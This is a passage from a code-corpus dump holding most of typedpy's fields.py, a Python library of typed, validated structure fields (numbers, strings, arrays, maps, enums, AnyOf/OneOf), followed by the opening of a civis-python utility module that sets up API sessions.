instance\")\n\n\ndef wrap_val(v):\n return \"'{}'\".format(v) if isinstance(v, str) else v\n\n\nclass StructureReference(Field):\n \"\"\"\n A Field that is an embedded structure within other structure. Allows to create hierarchy.\n This is useful if you want to inline your Structure, as opposed to create an explicit\n class for it.\n All the arguments are passed as attributes of the structure. Example:\n\n .. code-block:: python\n\n StructureReference(\n _additionalProperties = False,\n id = String,\n name = String\n age = AnyOf[PositiveInt, PositiveFloat]\n )\n\n\n Important: Since Typedpy dynamically creates an internal class for it, this field cannot be pickled!\n \"\"\"\n\n counter = 0\n\n def __init__(self, **kwargs):\n classname = \"StructureReference_\" + str(StructureReference.counter)\n StructureReference.counter += 1\n\n self._newclass = type(classname, (Structure,), kwargs)\n super().__init__(kwargs)\n\n def __set__(self, instance, value):\n if not (isinstance(value, (dict, Structure))):\n raise TypeError(\n \"{}: Expected a dictionary or Structure; got {}\".format(\n self._name, value\n )\n )\n extracted_values = (\n {k: v for (k, v) in value.__dict__.items() if k != \"_instantiated\"}\n if isinstance(value, (Structure,))\n else value\n )\n newval = self._newclass(**extracted_values)\n super().__set__(instance, newval)\n\n def __serialize__(self, value):\n raise TypeError(\"{}: StructuredReference Cannot be pickled\".format(self._name))\n\n def __str__(self):\n props = []\n for k, val in sorted(self._newclass.__dict__.items()):\n if val is not None and not k.startswith(\"_\"):\n props.append(\"{} = {}\".format(k, str(val)))\n\n propst = \". Properties: {}\".format(\", \".join(props)) if props else \"\"\n return \"\".format(propst)\n\n\nclass ImmutableField(Field):\n _immutable = True\n\n\nclass Number(Field):\n \"\"\"\n Base class for numerical fields. Based on Json schema draft4.\n Accepts and int or float.\n\n Arguments:\n multipleOf(int): optional\n The number must be a multiple of this number\n minimum(int or float): optional\n value cannot be lower than this number\n maximum(int or float): optional\n value cannot be higher than this number\n exclusiveMaximum(bool): optional\n marks the maximum threshold above as exclusive\n\n \"\"\"\n\n def __init__(\n self,\n *args,\n multiplesOf=None,\n minimum=None,\n maximum=None,\n exclusiveMaximum=None,\n **kwargs\n ):\n self.multiplesOf = multiplesOf\n self.minimum = minimum\n self.maximum = maximum\n self.exclusiveMaximum = exclusiveMaximum\n super().__init__(*args, **kwargs)\n\n @staticmethod\n def _validate_static(self, value):\n def is_number(val):\n return isinstance(val, (float, int, Decimal))\n\n def err_prefix():\n return (\n \"{}: Got {}; \".format(self._name, wrap_val(value)) if self._name else \"\"\n )\n\n if not is_number(value):\n raise TypeError(\"{}Expected a number\".format(err_prefix()))\n if (\n isinstance(self.multiplesOf, float)\n and int(value / self.multiplesOf) != value / self.multiplesOf\n or isinstance(self.multiplesOf, int)\n and value % self.multiplesOf\n ):\n raise ValueError(\n \"{}Expected a a multiple of {}\".format(err_prefix(), self.multiplesOf)\n )\n if (is_number(self.minimum)) and self.minimum > value:\n raise ValueError(\n \"{}Expected a minimum of {}\".format(err_prefix(), self.minimum)\n )\n if is_number(self.maximum):\n if self.exclusiveMaximum and self.maximum == value:\n raise ValueError(\n \"{}Expected a maximum of less than {}\".format(\n err_prefix(), self.maximum\n )\n )\n else:\n if self.maximum < value:\n raise ValueError(\n \"{}Expected a maximum of {}\".format(err_prefix(), self.maximum)\n )\n\n def _validate(self, value):\n Number._validate_static(self, value)\n\n def __set__(self, instance, value):\n if not getattr(instance, \"_skip_validation\", False):\n self._validate(value)\n super().__set__(instance, value)\n\n\nclass Integer(TypedField, Number):\n \"\"\"\n An extension of :class:`Number` for an integer. Accepts int\n \"\"\"\n\n _ty = int\n\n def _validate(self, value):\n super()._validate(value)\n Number._validate_static(self, value)\n\n\nclass DecimalNumber(Number):\n \"\"\"\n An extension of :class:`Number` for a Decimal. Accepts anything that can be converted to a Decimal\n \"\"\"\n\n def __set__(self, instance, value):\n try:\n value = Decimal(value)\n except TypeError as ex:\n raise TypeError(\"{}: {}\".format(self._name, ex.args[0]))\n except InvalidOperation as ex:\n raise ValueError(\"{}: {}\".format(self._name, ex.args[0]))\n\n super().__set__(instance, value)\n\n\nclass StructureClass(TypedField):\n _ty = StructMeta\n\n\nclass String(TypedField):\n \"\"\"\n A string value. Accepts input of `str`\n\n Arguments:\n minLength(int): optional\n minimal length\n maxLength(int): optional\n maximal lengthr\n pattern(str): optional\n string of a regular expression\n\n \"\"\"\n\n _ty = str\n\n def __init__(self, *args, minLength=None, maxLength=None, pattern=None, **kwargs):\n self.minLength = minLength\n self.maxLength = maxLength\n self.pattern = pattern\n if self.pattern is not None:\n self._compiled_pattern = re.compile(self.pattern)\n super().__init__(*args, **kwargs)\n\n def _validate(self, value):\n String._validate_static(self, value)\n\n @staticmethod\n def _validate_static(self, value):\n def err_prefix():\n return (\n \"{}: Got {}; \".format(self._name, wrap_val(value)) if self._name else \"\"\n )\n\n if not isinstance(value, str):\n raise TypeError(\"{}Expected a string\".format(err_prefix()))\n if self.maxLength is not None and len(value) > self.maxLength:\n raise ValueError(\n \"{}Expected a maximum length of {}\".format(err_prefix(), self.maxLength)\n )\n if self.minLength is not None and len(value) < self.minLength:\n raise ValueError(\n \"{}Expected a minimum length of {}\".format(err_prefix(), self.minLength)\n )\n if self.pattern is not None and not self._compiled_pattern.match(value):\n raise ValueError(\n '{}Does not match regular expression: \"{}\"'.format(\n err_prefix(), self.pattern\n )\n )\n\n def __set__(self, instance, value):\n self._validate(value)\n super().__set__(instance, value)\n\n\nclass Function(Field):\n \"\"\"\n A function. Note that this can't be any callable (it can't be a class, for example), but a real function\n \"\"\"\n\n def __set__(self, instance, value):\n def is_function(f):\n return type(f) == type(lambda x:x) or type(f) == type(open)\n\n def err_prefix():\n return (\n \"{}: Got {}; \".format(self._name, wrap_val(value)) if self._name else \"\"\n )\n\n if not is_function(value):\n raise TypeError(\"{}Expected a function\".format(err_prefix()))\n super().__set__(instance, value)\n\n\nclass Anything(Field):\n \"\"\"\n A field that can contain anything (similar to \"any\" in Typescript).\n Example:\n\n .. code-block:: python\n\n class Foo(Structure):\n i = Integer\n some_content = Anything\n\n # now we can assign anything to some_content property:\n Foo(i=5, some_content = \"whatever\")\n Foo(i=5, some_content = [1,2,3])\n Foo(i=5, some_content = Bar())\n\n \"\"\"\n\n pass\n\n\nclass Float(TypedField, Number):\n \"\"\"\n An extension of :class:`Number` for a float\n \"\"\"\n\n _ty = float\n\n def _validate(self, value):\n super()._validate(value)\n Number._validate_static(self, value)\n\n\nclass Boolean(TypedField):\n \"\"\"\n Value of type bool. True or False.\n \"\"\"\n\n _ty = bool\n\n\nclass Positive(Number):\n \"\"\"\n An extension of :class:`Number`. Requires the number to be positive\n \"\"\"\n\n def __set__(self, instance, value):\n if value <= 0:\n raise ValueError(\"{}: Must be positive\".format(self._name))\n super().__set__(instance, value)\n\n\nclass PositiveFloat(Float, Positive):\n \"\"\"\n An combination of :class:`Float` and :class:`Positive`\n \"\"\"\n\n pass\n\n\nclass PositiveInt(Integer, Positive):\n \"\"\"\n An combination of :class:`Integer` and :class:`Positive`\n \"\"\"\n\n pass\n\n\nclass _ListStruct(list):\n \"\"\"\n This is a useful wrapper for the content of list in an Array field.\n It ensures that an update of the form:\n mystruct.my_array[i] = new_val\n Will not bypass the validation of the Array.\n \"\"\"\n\n def __init__(self, array: Field, struct_instance: Structure, mylist):\n self._field_definition = array\n self._instance = struct_instance\n super().__init__(mylist)\n\n def __setitem__(self, key, value):\n copied = self[:]\n copied.__setitem__(key, value)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n\n def append(self, value):\n copied = self[:]\n copied.append(value)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n super().append(value)\n\n def extend(self, value):\n copied = self[:]\n copied.extend(value)\n if getattr(self, \"_instance\", None):\n setattr(\n self._instance, getattr(self._field_definition, \"_name\", None), copied\n )\n\n def insert(self, index: int, value):\n copied = self[:]\n copied.insert(index, value)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n\n def remove(self, ind):\n copied = self[:]\n copied.remove(ind)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n\n def pop(self, index: int = -1):\n copied = self[:]\n res = copied.pop(index)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n return res\n\n def __getstate__(self):\n return {\n \"the_instance\": self._instance,\n \"the_array\": self._field_definition,\n \"the_values\": self[:],\n }\n\n def __deepcopy__(self, memo={}):\n vals = [deepcopy(v) for v in self[:]]\n return _ListStruct(\n array=deepcopy(self._field_definition),\n struct_instance=memo[id(self._instance)],\n mylist=vals,\n )\n\n def __setstate__(self, state):\n self._field_definition = state[\"the_array\"]\n self._instance = state[\"the_instance\"]\n super().__init__(state[\"the_values\"])\n\n\nclass _DictStruct(dict):\n \"\"\"\n This is a useful wrapper for the content of dict in an Map field.\n It ensures that an update of the form:\n mystruct.my_map[i] = new_val, or\n mystruct.my_map.update(some_dict)\n\n ...will not bypass the validation of the Map.\n \"\"\"\n\n def __init__(self, the_map, struct_instance, mydict):\n self._field_definition = the_map\n self._instance = struct_instance\n super().__init__(mydict)\n\n def __setitem__(self, key, value):\n copied = self.copy()\n copied.__setitem__(key, value)\n if getattr(self, \"_instance\", None):\n setattr(\n self._instance, getattr(self._field_definition, \"_name\", None), copied\n )\n super().__setitem__(key, value)\n\n def __delitem__(self, key):\n copied = self.copy()\n del copied[key]\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n\n def update(self, *args, **kwargs):\n copied = self.copy()\n res = copied.update(*args, **kwargs)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n return res\n\n def __getstate__(self):\n return {\n \"_instance\": self._instance,\n \"_map\": self._field_definition,\n \"mydict\": self.copy(),\n }\n\n def __setstate__(self, state):\n self._field_definition = state[\"_map\"]\n self._instance = state[\"_instance\"]\n super().__init__(state[\"mydict\"])\n\n\nclass _CollectionMeta(type):\n def __getitem__(cls, item):\n def validate_and_get_field(val):\n if isinstance(val, Field):\n return val\n elif Field in getattr(val, \"__mro__\", {}):\n return val()\n elif Structure in getattr(val, \"__mro__\", {}):\n return ClassReference(val)\n elif is_function_returning_field(val):\n return val()\n else:\n raise TypeError(\"Expected a Field class or instance\")\n\n if isinstance(item, tuple):\n items = [validate_and_get_field(it) for it in item]\n return cls(items=items)\n return cls(items=validate_and_get_field(item))\n\n\nclass _EnumMeta(type):\n def __getitem__(cls, values):\n if isinstance(values, (type,)) and issubclass(values, (enum.Enum,)):\n return cls(values=values)\n return cls(values=list(values))\n\n\nclass _JSONSchemaDraft4ReuseMeta(type):\n def __getitem__(cls, item):\n def validate_and_get_field(val):\n if isinstance(val, Field):\n return val\n elif Field in getattr(val, \"__mro__\", {}):\n return val()\n elif Structure in getattr(val, \"__mro__\", {}):\n return ClassReference(val)\n elif is_function_returning_field(val):\n return val()\n else:\n raise TypeError(\"Expected a Field class or instance\")\n\n if isinstance(item, tuple):\n fields = [validate_and_get_field(it) for it in item]\n return cls(fields)\n return cls([validate_and_get_field(item)])\n\n\nclass SizedCollection(object):\n def __init__(self, *args, minItems=None, maxItems=None, **kwargs):\n self.minItems = minItems\n self.maxItems = maxItems\n super().__init__(*args, **kwargs)\n\n def validate_size(self, items, name):\n if self.minItems is not None and len(items) < self.minItems:\n raise ValueError(\n \"{}: Expected length of at least {}\".format(name, self.minItems)\n )\n if self.maxItems is not None and len(items) > self.maxItems:\n raise ValueError(\n \"{}: Expected length of at most {}\".format(name, self.maxItems)\n )\n\n\nclass Set(SizedCollection, TypedField, metaclass=_CollectionMeta):\n \"\"\"\n A set collection. Accepts input of type `set`\n\n Arguments:\n minItems(int): optional\n minimal size\n maxItems(int): optional\n maximal size\n items(:class:`Field` or :class:`Structure`): optional\n The type of the content, can be a predefined :class:`Structure` or\n :class:`Field`\n\n Examples:\n\n .. code-block:: python\n\n Set[String]\n Set(items=Integer(maximum=10), maxItems = 10)\n\n # let's assume we defined a Structure 'Person', then we can use it too:\n Set[Person]\n\n\n \"\"\"\n\n _ty = set\n\n def __init__(self, *args, items=None, **kwargs):\n self.items = _map_to_field(items)\n\n if isinstance(self.items, TypedField) and not getattr(\n getattr(self.items, \"_ty\"), \"__hash__\"\n ):\n raise TypeError(\n \"Set element of type {} is not hashable\".format(\n getattr(self.items, \"_ty\")\n )\n )\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n if not isinstance(value, set):\n raise TypeError(\n \"{}: Got {}; Expected {}\".format(self._name, wrap_val(value), set)\n )\n self.validate_size(value, self._name)\n if self.items is not None:\n temp_st = Structure()\n setattr(self.items, \"_name\", self._name)\n res = set()\n for val in value:\n self.items.__set__(temp_st, val)\n res.add(getattr(temp_st, getattr(self.items, \"_name\")))\n value = res\n super().__set__(instance, value)\n\n\nclass Map(SizedCollection, TypedField, metaclass=_CollectionMeta):\n \"\"\"\n A map/dictionary collection. Accepts input of type `dict`\n\n Arguments:\n minItems(int): optional\n minimal size\n maxItems(int): optional\n maximal size\n items(tuple of 2 :class:`Field` or :class:`Structure` elements): optional\n The first element is the Field for keys, the second is for values.\n Examples:\n\n .. code-block:: python\n\n age_by_name = Map[String, PositiveInt]\n # Let's assume we defined a Structure \"Person\"\n person_by_id = Map[String, Person]\n # even Structure reference is supported for keys!\n id_by_person = Map[Person, String]\n id_by_person = Map[Person, String]\n\n \"\"\"\n\n _ty = dict\n\n def __init__(self, *args, items=None, **kwargs):\n if items is not None and (\n not isinstance(items, (tuple, list)) or len(items) != 2\n ):\n raise TypeError(\"items is expected to be a list/tuple of two fields\")\n if items is None:\n self.items = None\n else:\n self.items = []\n for item in items:\n self.items.append(_map_to_field(item))\n key_field = self.items[0]\n if isinstance(key_field, TypedField) and not getattr(\n getattr(key_field, \"_ty\"), \"__hash__\"\n ):\n raise TypeError(\n \"Key field of type {}, with underlying type of {} is not hashable\".format(\n key_field, getattr(key_field, \"_ty\")\n )\n )\n self._custom_deep_copy_implementation = True\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n if not isinstance(value, dict):\n raise TypeError(\"%s: Expected %s\" % (self._name, dict))\n self.validate_size(value, self._name)\n\n if self.items is not None:\n temp_st = Structure()\n key_field, value_field = self.items[0], self.items[1]\n setattr(key_field, \"_name\", self._name + \"_key\")\n setattr(value_field, \"_name\", self._name + \"_value\")\n res = OrderedDict()\n\n for key, val in value.items():\n key_field.__set__(temp_st, key)\n value_field.__set__(temp_st, val)\n res[getattr(temp_st, getattr(key_field, \"_name\"))] = getattr(\n temp_st, getattr(value_field, \"_name\")\n )\n value = res\n super().__set__(instance, _DictStruct(self, instance, value))\n\n\nclass Array(SizedCollection, TypedField, metaclass=_CollectionMeta):\n \"\"\"\n An Array field, similar to a list. Supports the properties in JSON schema draft 4.\n Expected input is of type `list`.\n\n Arguments:\n minItems(int): optional\n minimal size\n maxItems(int): optional\n maximal size\n unqieItems(bool): optional\n are elements required to be unique?\n additionalItems(bool): optional\n Relevant in case items parameter is a list of Fields. Is it allowed to have additional\n elements beyond the ones defined in \"items\"?\n items(a :class:`Field` or :class:`Structure`, or a list/tuple of :class:`Field` or :class:`Structure`): optional\n Describes the fields of the elements.\n If a items if a :class:`Field`, then it applies to all items.\n If a items is a list, then every element in the content is expected to be\n of the corresponding field in items.\n Examples:\n\n .. code-block:: python\n\n names = Array[String]\n names = Array[String(minLengh=3)]\n names = Array(minItems=5, items=String)\n my_record = Array(items=[String, Integer(minimum=5), String])\n my_lists = Array[Array[Integer]]\n my_structs = Array[StructureReference(a=Integer, b=Float)]\n # Let's say we defined a Structure \"Person\"\n people = Array[Person]\n\n \"\"\"\n\n _ty = list\n\n def __init__(\n self, *args, items=None, uniqueItems=None, additionalItems=None, **kwargs\n ):\n \"\"\"\n Constructor\n :param args: pass-through\n :param items: either a single field, which will be enforced for all elements, or a list\n of fields which enforce the elements with the correspondent index\n :param uniqueItems: are elements required to be unique?\n :param additionalItems: Relevant if \"items\" is a list. Is it allowed to have additional\n elements beyond the ones defined in \"items\"?\n :param kwargs: pass-through\n \"\"\"\n self.uniqueItems = uniqueItems\n self.additionalItems = additionalItems\n if isinstance(items, list):\n self.items = []\n for item in items:\n self.items.append(_map_to_field(item))\n else:\n self.items = _map_to_field(items)\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n verify_type_and_uniqueness(list, value, self._name, self.uniqueItems)\n self.validate_size(value, self._name)\n if self.items is not None:\n if isinstance(self.items, Field):\n temp_st = Structure()\n setattr(self.items, \"_name\", self._name)\n res = []\n for i, val in enumerate(value):\n setattr(self.items, \"_name\", self._name + \"_{}\".format(str(i)))\n self.items.__set__(temp_st, val)\n res.append(getattr(temp_st, getattr(self.items, \"_name\")))\n value = res\n elif isinstance(self.items, list):\n additional_properties_forbidden = self.additionalItems is False\n\n if not getattr(instance, \"_skip_validation\", False):\n if len(self.items) > len(value) or (\n additional_properties_forbidden and len(self.items) > len(value)\n ):\n raise ValueError(\n \"{}: Got {}; Expected an array of length {}\".format(\n self._name, value, len(self.items)\n )\n )\n temp_st = Structure()\n temp_st._skip_validation = getattr(instance, \"_skip_validation\", False)\n res = []\n for ind, item in enumerate(self.items):\n if ind >= len(value):\n continue\n setattr(item, \"_name\", self._name + \"_{}\".format(str(ind)))\n item.__set__(temp_st, value[ind])\n res.append(getattr(temp_st, getattr(item, \"_name\")))\n res += value[len(self.items) :]\n value = res\n\n super().__set__(instance, _ListStruct(self, instance, value))\n\n\ndef verify_type_and_uniqueness(the_type, value, name, has_unique_items):\n if not isinstance(value, the_type):\n raise TypeError(\n \"{}: Got {}; Expected {}\".format(name, wrap_val(value), str(the_type))\n )\n if has_unique_items:\n unique = reduce(\n lambda unique_vals, x: unique_vals.append(x) or unique_vals\n if x not in unique_vals\n else unique_vals,\n value,\n [],\n )\n if len(unique) < len(value):\n raise ValueError(\n \"{}: Got {}; Expected unique items\".format(name, wrap_val(value))\n )\n\n\nclass Tuple(TypedField, metaclass=_CollectionMeta):\n \"\"\"\n A tuple field, supports unique items option.\n Expected input is of type `tuple`.\n\n Arguments:\n\n unqieItems(`bool`): optional\n are elements required to be unique?\n\n items(`list`/`tuple` of :class:`Field` or :class:`Structure`): optional\n Describes the fields of the elements.\n Every element in the content is expected to be\n of the corresponding :class:`Field` in items.\n\n\n Examples:\n\n .. code-block:: python\n\n // a is a tuple of exactly 2 strings that are different from each other.\n a = Tuple(uniqueItems=True, items = [String, String])\n\n // b is a tuple of 3: string, string and a number up to 10.\n b = Tuple(items = [String, String, Number(maximum=10)])\n\n // c is a tuple of 3: integer, string, float.\n c = Tuple[Integer, String, Float]\n\n // The following define a tuple of any number of Integers\n d = Tuple[Integer]\n\n // It can also contain other structures:\n // Assume we have something like: class Foo(Structure): pass\n // e is a tuple of any number of Integers or Foo instances\n e = Tuple[AnyOf[Integer, Foo]]\n\n \"\"\"\n\n _ty = tuple\n\n def __init__(self, *args, items, uniqueItems=None, **kwargs):\n \"\"\"\n Constructor\n :param args: pass-through\n :param items: either a single field, which will be enforced for all elements, or a list\n of fields which enforce the elements with the correspondent index\n :param uniqueItems: are elements required to be unique?\n :param kwargs: pass-through\n \"\"\"\n self.uniqueItems = uniqueItems\n if isinstance(items, (list, tuple)):\n self.items = []\n for item in items:\n if isinstance(item, Field):\n self.items.append(item)\n elif Field in item.__mro__:\n self.items.append(item())\n else:\n raise TypeError(\"Expected a Field class or instance\")\n elif isinstance(items, (Field,)) or Field in items.__mro__:\n self.items = [items]\n else:\n raise TypeError(\"Expected a list/tuple of Fields or a single Field\")\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n verify_type_and_uniqueness(tuple, value, self._name, self.uniqueItems)\n if len(self.items) != len(value) and len(self.items) > 1:\n raise ValueError(\n \"{}: Got {}; Expected a tuple of length {}\".format(\n self._name, wrap_val(value), len(self.items)\n )\n )\n\n temp_st = Structure()\n res = []\n items = self.items if len(self.items) > 1 else self.items * len(value)\n for ind, item in enumerate(items):\n setattr(item, \"_name\", self._name + \"_{}\".format(str(ind)))\n item.__set__(temp_st, value[ind])\n res.append(getattr(temp_st, getattr(item, \"_name\")))\n res += value[len(items) :]\n value = tuple(res)\n\n super().__set__(instance, value)\n\n\nclass Enum(Field, metaclass=_EnumMeta):\n \"\"\"\n Enum field. value can be one of predefined values\n\n Arguments:\n values(`list` or `set` or `tuple`, alternatively an enum Type):\n allowed values. Can be of any type.\n Alternatively, can be an enum.Enum type. See example below.\n When defined with an enum.Enum, serialization converts to strings,\n while deserialization expects strings.\n Examples:\n\n .. code-block:: python\n\n class Values(enum.Enum):\n ABC = enum.auto()\n DEF = enum.auto()\n GHI = enum.auto()\n\n class Example(Structure):\n arr = Array[Enum[Values]]\n e = Enum['abc', 'x', 'def', 3]\n\n example = Example(arr=[Values.ABC, 'DEF'],e=3)\n assert example.arr = [Values.ABC, Values.DEF]\n\n # deserialization example:\n deserialized = Deserializer(target_class=Example).deserialize({'arr': ['GHI', 'DEF', 'ABC'], 'e': 3})\n assert deserialized.arr == [Values.GHI, Values.DEF, Values.ABC]\n \"\"\"\n\n def __init__(self, *args, values, **kwargs):\n self._is_enum = isinstance(values, (type,)) and issubclass(values, enum.Enum)\n if self._is_enum:\n self._enum_class = values\n self.values = list(values)\n else:\n self.values = values\n super().__init__(*args, **kwargs)\n\n def _validate(self, value):\n if self._is_enum:\n enum_names = {v.name for v in self._enum_class}\n if value not in enum_names and not isinstance(value, (self._enum_class,)):\n raise ValueError(\n \"{}: Must be a value of {}\".format(self._name, self._enum_class)\n )\n\n elif value not in self.values:\n raise ValueError(\"{}: Must be one of {}\".format(self._name, self.values))\n\n def __set__(self, instance, value):\n self._validate(value)\n if self._is_enum:\n if isinstance(value, (str,)):\n value = self._enum_class[value]\n super().__set__(instance, value)\n\n\nclass EnumString(Enum, String):\n \"\"\"\n Combination of :class:`Enum` and :class:`String`. This is useful if you want to further\n limit your allowable enum values, using :class:`String` attributes, such as pattern, maxLength.\n\n Example:\n\n .. code-block:: python\n\n predefined_list = ['abc', 'x', 'def', 'yy']\n\n EnumString(values=predefined_list, minLength=3)\n\n \"\"\"\n\n pass\n\n\nclass Sized(Field):\n \"\"\"\n The length of the value is limited to be at most the maximum given.\n The value can be any iterable.\n\n Arguments:\n\n maxlen(`int`):\n maximum length\n\n \"\"\"\n\n def __init__(self, *args, maxlen, **kwargs):\n self.maxlen = maxlen\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n if len(value) > self.maxlen:\n raise ValueError(\"{}: Too long\".format(self._name))\n super().__set__(instance, value)\n\n\nclass SizedString(String, Sized):\n pass\n\n\ndef _str_for_multioption_field(instance):\n name = instance.__class__.__name__\n if instance.get_fields():\n fields_st = \", \".join([str(field) for field in instance.get_fields()])\n propst = \" [{}]\".format(fields_st)\n else:\n propst = \"\"\n return \"<{}{}>\".format(name, propst)\n\n\nclass MultiFieldWrapper(object):\n \"\"\"\n An abstract base class for AllOf, AnyOf, OneOf, etc.\n It provides flexibility in reading the \"fields\" argument.\n \"\"\"\n\n def __init__(self, *arg, fields, **kwargs):\n if isinstance(fields, list):\n self._fields = []\n for item in fields:\n self._fields.append(_map_to_field(item))\n else:\n raise TypeError(\"Expected a Field class or instance\")\n super().__init__(*arg, **kwargs)\n\n def get_fields(self):\n return self._fields\n\n\nclass AllOf(MultiFieldWrapper, Field, metaclass=_JSONSchemaDraft4ReuseMeta):\n \"\"\"\n Content must adhere to all requirements in the fields arguments.\n Arguments:\n\n fields( `list` of :class:`Field`): optional\n the content should match all of the fields in the list\n\n Example:\n\n .. code-block:: python\n\n AllOf[Number(maximum=20, minimum=-10), Integer, Positive]\n\n \"\"\"\n\n def __init__(self, fields):\n super().__init__(fields=fields)\n\n def __set__(self, instance, value):\n for field in self.get_fields():\n setattr(field, \"_name\", self._name)\n field.__set__(instance, value)\n super().__set__(instance, value)\n\n def __str__(self):\n return _str_for_multioption_field(self)\n\n\nclass AnyOf(MultiFieldWrapper, Field, metaclass=_JSONSchemaDraft4ReuseMeta):\n \"\"\"\n Content must adhere to one or more of the requirements in the fields arguments.\n Arguments:\n\n fields( `list` of :class:`Field`): optional\n the content should match at least one of the fields in the list\n\n Example:\n\n .. code-block:: python\n\n AnyOf[Number(maximum=20, minimum=-10), Integer, Positive, String]\n\n \"\"\"\n\n def __init__(self, fields):\n super().__init__(fields=fields)\n\n def __set__(self, instance, value):\n matched = False\n for field in self.get_fields():\n setattr(field, \"_name\", self._name)\n try:\n field.__set__(instance, value)\n matched = True\n except TypeError:\n pass\n except ValueError:\n pass\n if not matched:\n raise ValueError(\n \"{}: {} Did not match any field option\".format(\n self._name, wrap_val(value)\n )\n )\n super().__set__(instance, value)\n\n def __str__(self):\n return _str_for_multioption_field(self)\n\n\nclass OneOf(MultiFieldWrapper, Field, metaclass=_JSONSchemaDraft4ReuseMeta):\n \"\"\"\n Content must adhere to one, and only one, of the requirements in the fields arguments.\n Arguments:\n\n fields( `list` of :class:`Field`): optional\n the content should match one, and only one, of the fields in the list\n\n Example:\n\n .. code-block:: python\n\n OneOf[Number(maximum=20, minimum=-10), Integer, Positive, String]\n\n \"\"\"\n\n def __init__(self, fields):\n super().__init__(fields=fields)\n\n def __set__(self, instance, value):\n matched = 0\n for field in self.get_fields():\n setattr(field, \"_name\", self._name)\n try:\n field.__set__(instance, value)\n matched += 1\n except TypeError:\n pass\n except ValueError:\n pass\n if not matched:\n raise ValueError(\n \"{}: Got {}; Did not match any field option\".format(self._name, value)\n )\n if matched > 1:\n raise ValueError(\n \"{}: Got {}; Matched more than one field option\".format(\n self._name, value\n )\n )\n super().__set__(instance, value)\n\n def __str__(self):\n return _str_for_multioption_field(self)\n\n\nclass NotField(MultiFieldWrapper, Field, metaclass=_JSONSchemaDraft4ReuseMeta):\n \"\"\"\n Content *must not* adhere to any of the requirements in the fields arguments.\n Arguments:\n\n fields( `list` of :class:`Field`): optional\n the content must not match any of the fields in the lists\n\n Examples:\n\n .. code-block:: python\n\n NotField([Number(multiplesOf=5, maximum=20, minimum=-10), String])\n NotField[Positive]\n\n \"\"\"\n\n def __init__(self, fields):\n super().__init__(fields=fields)\n\n def __set__(self, instance, value):\n for field in self.get_fields():\n setattr(field, \"_name\", self._name)\n try:\n field.__set__(instance, value)\n except TypeError:\n pass\n except ValueError:\n pass\n else:\n raise ValueError(\n \"{}: Got {}; Expected not to match any field definition\".format(\n self._name, wrap_val(value)\n )\n )\n super().__set__(instance, value)\n\n def __str__(self):\n return _str_for_multioption_field(self)\n\n\nclass ValidatedTypedField(TypedField):\n def __set__(self, instance, value):\n self._validate_func(value) # pylint: disable=E1101\n super().__set__(instance, value)\n\n\ndef create_typed_field(classname, cls, validate_func=None):\n \"\"\"\n Factory that generates a new class for a :class:`Field` as a wrapper of any class.\n Example:\n Given a class Foo, and a validation function for the value in Foo - validate_foo, the line\n\n .. code-block:: python\n\n ValidatedFooField = create_typed_field(\"FooField\", Foo, validate_func=validate_foo)\n\n Generates a new :class:`Field` class that validates the content using validate_foo, and can be\n used just like any :class:`Field` type.\n\n .. code-block:: python\n\n class A(Structure):\n foo = ValidatedFooField\n bar = Integer\n\n # asumming we have an instance of Foo, called my_foo:\n A(bar=4, foo=my_foo)\n\n Arguments:\n\n classname(`str`):\n the content must not match any of the fields in the lists\n \"\"\"\n\n def validate_wrapper(cls, value):\n if validate_func is None:\n return\n validate_func(value)\n\n return type(\n classname,\n (ValidatedTypedField,),\n {\"_validate_func\": validate_wrapper, \"_ty\": cls},\n )\n\n\nclass SerializableField(ABC):\n \"\"\"\n An abstract class for a field that has custom serialization or deserialization.\n can override the method:\n serialize(self, value),\n deserialize(self, value)\n\n These methods are not being used for pickling.\n \"\"\"\n\n def serialize(self, value):\n return value\n\n def deserialize(self, value):\n return value\n\n\nclass ExceptionField(TypedField, SerializableField):\n \"\"\"\n As Exception. This is serialized as the string representation of the exception.\n It does not support deserialization.\n \"\"\"\n\n _ty = Exception\n\n def serialize(self, value):\n return str(value)\n","sub_path":"typedpy/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":38891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467113633","text":"from builtins import super\nimport logging\nimport os\nimport re\nimport sys\nimport time\nimport uuid\n\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util import Retry\n\nimport civis\n\n\nlog = logging.getLogger(__name__)\nUNDERSCORER1 = re.compile(r'(.)([A-Z][a-z]+)')\nUNDERSCORER2 = re.compile('([a-z0-9])([A-Z])')\n\n\ndef maybe_get_random_name(name):\n if not name:\n name = uuid.uuid4().hex\n return name\n\n\ndef camel_to_snake(word):\n # https://gist.github.com/jaytaylor/3660565\n word = UNDERSCORER1.sub(r'\\1_\\2', word)\n return UNDERSCORER2.sub(r'\\1_\\2', word).lower()\n\n\ndef to_camelcase(s):\n return re.sub(r'(^|_)([a-zA-Z])', lambda m: m.group(2).upper(), s)\n\n\ndef get_api_key(api_key):\n \"\"\"Pass-through if `api_key` is not None otherwise tries the CIVIS_API_KEY\n environmental variable.\n \"\"\"\n if api_key is not None: # always prefer user given one\n return api_key\n api_key = os.environ.get(\"CIVIS_API_KEY\", None)\n if api_key is None:\n raise EnvironmentError(\"No Civis API key found. Please store in \"\n \"CIVIS_API_KEY environment variable\")\n return api_key\n\n\ndef open_session(api_key, max_retries=5, user_agent=\"civis-python\"):\n \"\"\"Create a new Session which can connect with the Civis API\"\"\"\n civis_version = civis.__version__\n session = requests.Session()\n session.auth = (api_key, '')\n session_agent = session.headers.get('User-Agent', '')\n ver_string = \"{}.{}.{}\".format(sys.version_info.major,\n sys.version_info.minor,\n sys.version_info.micro)\n user_agent = \"{}/Python v{} Civis v{} {}\".format(\n user_agent, ver_string, civis_version, session_agent)\n session.headers.update({\"User-Agent\": 